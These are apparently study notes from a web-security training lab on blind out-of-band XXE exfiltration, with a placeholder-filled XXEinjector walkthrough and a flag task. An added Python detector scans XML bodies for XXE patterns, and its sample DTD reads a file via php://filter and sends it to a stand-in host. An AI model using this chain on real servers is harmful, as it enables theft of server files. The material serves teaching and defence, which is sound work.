🐀Blind Data Exfiltration
Let's imagine we neither get the output of any of the XML entities nor do we get any PHP errors displayed.
Out-of-band Data Exfiltration
Instead of having the web application output our file entity to a specific XML entity, we will make the web application send a web request to our web server with the content of the file we are reading.
We will use a parameter entity for the content of the file we are reading while utilizing PHP filter to base64 encode it. Then, we will create another external parameter entity and reference it to our IP, and place the file parameter value as part of the URL being requested over HTTP.
And here is a PHP script (called index.php) to decode and output to the terminal ->
Then we run a PHP webserver:
Now we will simply add <root>&content;</root> to our payload, which is needed to reference our entity and have it send the request to our machine with the file content.
And once we send the request, we should see in our terminal ->
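Added example from the defender's side (not part of the original notes and not XXEinjector code): a Python check that flags request bodies and DTDs carrying the building blocks of the out-of-band chain just described (inline DTD, parameter entities, SYSTEM references, php://filter wrapper, an entity reference embedded in a URL). The sample documents, host name and file path are constructed placeholders.

```python
"""Detect the out-of-band XXE pattern in raw XML bodies (added example)."""
import re
from dataclasses import dataclass, field

# (finding label, pattern). Labels are our own; patterns run on the raw body,
# before any parser gets a chance to resolve entities.
CHECKS = [
    ("inline_dtd", re.compile(r"<!DOCTYPE\b", re.I)),
    ("parameter_entity", re.compile(r"<!ENTITY\s+%", re.I)),
    ("external_entity", re.compile(r"<!ENTITY\b[^>]*\b(?:SYSTEM|PUBLIC)\b", re.I)),
    # A parameter entity loaded over HTTP is how the remote script.dtd is pulled in.
    ("remote_dtd_load", re.compile(r"<!ENTITY\s+%\s*\w+\s+SYSTEM\s+[\"']https?://", re.I)),
    ("php_filter_wrapper", re.compile(r"php://filter/", re.I)),
    # An entity reference inside a URL carries file content to the listener.
    ("entity_in_url", re.compile(r"https?://[^\"'\s>]*%\w+;", re.I)),
]


@dataclass
class XxeVerdict:
    findings: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.findings)

    @property
    def block(self) -> bool:
        # An API that never needs DTDs can reject any entity declaration outright.
        return "parameter_entity" in self.findings or "external_entity" in self.findings


def inspect_xml_body(body: str) -> XxeVerdict:
    """Return the XXE indicators present in a raw XML request body or DTD."""
    verdict = XxeVerdict()
    for label, pattern in CHECKS:
        if pattern.search(body):
            verdict.findings.append(label)
    return verdict


# Constructed samples (placeholders, not captured traffic).
BENIGN_BODY = '<?xml version="1.0"?><root><email>user@example.com</email></root>'
OOB_BODY = ('<?xml version="1.0"?>'
            '<!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://EXAMPLE-HOST/script.dtd"> %xxe;]>'
            '<root>&content;</root>')
OOB_DTD = ('<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/PLACEHOLDER/file">'
           '<!ENTITY % oob "<!ENTITY content SYSTEM \'http://EXAMPLE-HOST/?content=%file;\'>">'
           '%oob;')

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_BODY), ("body", OOB_BODY), ("dtd", OOB_DTD)):
        print(name, inspect_xml_body(sample).findings)
```

Run the same check on outbound egress logs as well: a server fetching a .dtd from an unknown host is the other half of this pattern.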
Automated OOB Exfiltration
We can use a tool like XXEinjector. This tool supports most of the tricks we learned in this module, including basic XXE, CDATA source exfiltration, error-based XXE, and blind OOB XXE.
We can copy the HTTP request from Burp and write it to a file for the tool to use. We should not include the full XML data, only the first line, and write XXEINJECT after it as a position locator for the tool.
And the command we need to launch will be:
And the output will be displayed in a log file ->
Using Blind Data Exfiltration on the '/blind' page to read the content of '/327a6c4304ad5938eaf0efb6cc3e53dc.php' and get the flag.
script.dtd ->